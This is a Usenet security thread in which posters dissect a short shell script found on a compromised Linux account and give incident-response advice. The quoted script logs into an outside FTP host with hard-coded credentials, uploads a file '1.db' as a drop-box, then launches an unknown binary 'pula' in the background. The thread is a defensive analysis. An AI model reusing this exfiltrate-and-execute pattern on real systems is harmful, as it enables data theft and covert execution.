Re: Phishing Attempt

Moe Trin wrote:
On Tue, 02 Oct 2007, in the Usenet newsgroup comp.os.linux.security, in article
<47024555$0$15142$afc38c87@xxxxxxxxxxxxxxxxxxxx>, Mark wrote:

Mark wrote:

The account home directory contained a simple shell script of just over
a dozen lines I can't see what it's doing there.

OK below is the text of the script as it was sent back to me.

Confusion - above you say the script was in the home directory, while
here, you say it was sent back to you. WTF?

I can normally understand shell scripts, but I can't see what this one
is doing.

Your Linux box may only have a soft link from /usr/share/man/man1/sh.1
to something else - probably /usr/share/man/man1/bash.1 - you can follow
that to see what it's doing.

[useless empty lines deleted]

#!/bin/sh
HOST=3D'58.105.225.59'

That sets the variable 'HOST' to the IP address you are posting from.
The '=3D' is a mime abortion which actually translates to an equal sign.

USER=3D'test'
PASSWD=3D'testing'
FILE=3D'1.db'

Setting three more variables - what is the contents of file "1.db" in
this home directory?

=20

More mime crap - actual a space character

ftp -n $HOST <<END_SCRIPT
quote USER $USER
quote PASS $PASSWD
put $FILE
quit
END_SCRIPT

run the ftp command, connecting to the ftp server on 58.105.225.59,
logging in as user test with password testing, and uploading the file
'1.db' from the current directory on the host this script is run from,
and then quitting.

sleep 70
./pula &

Sleep for 70 seconds, and then run the application 'pula' which is also
in the current directory, putting that application into the background.

'pula' is a city in Croatia (14E/45N), the currency of Botswana (where
it apparently means "rain"), and seems to be some form of windoze worm
or virus that may have originated in Indonesia. I hadn't heard of it
effecting Linux before, and it doesn't show up in the list of malware
searched for in the windoze-wannabe "tools" chkrootkit or rkhunter.
Perhaps you should be looking at that file - starting with the command

little question: are you implying chkrootkit and rkhunter are well ... snakeoil
and totally unnecessary as security tools ?
i'm curious that's all

file ./pula

if you haven't wiped the directory already.

exit 0

That's the end of the script. Not knowing what's in the 'pula' file,
it's not possible to say what's going on, but this thing you quoted
seems to be running the 'pula' file, sleeping for 70 seconds. It's
also ftp'ing a file named '1.db' to the ftp account 'test' on the host
58.105.225.59. Did you look to see what is in there?

Actually, this looks more as if the host 58.105.225.59 is/was being used
as a 'drop-box', and you may find it useful searching that system to see
where the files are going. It _could_ be that another computer elsewhere
was connecting to the ftp server on 58.105.225.59 using the same account
name/password, and 'get'ing (and perhaps removing) the file, in which
case the only evidence might be in the (non-existent) ftp server logs.

Old guy

i would recommend to take an image of the system and sent it to
a computer security group like the FBI or something (i don't know where you're from)
you could also let your system just run and increase logging (sort of turning this system in an
evidence collecting machine) by applying some iptables rules and editing syslog.conf

the hacker doesn't seem to be very skilled but do some more exploring before concluding this also
install the same system on another machine, index system tools by taking md5sums and check them on the
compromised machine.

In fact this should be the first thing you should do since then you could determine if
setting up this system as a honeypot has any merit. If there is evidence of tampering with system tools
any logging can not be trusted anymore ! you should also check for unusual *** in .bash_history, ...
and /var/log/pacct if process accounting was enabled

After some valuable and correct info has been collected, send all of it to your governement's cybercrime unit.

I'm sorry if this reply doesn't make sense. It's pretty late and i'm not a native english speaker
.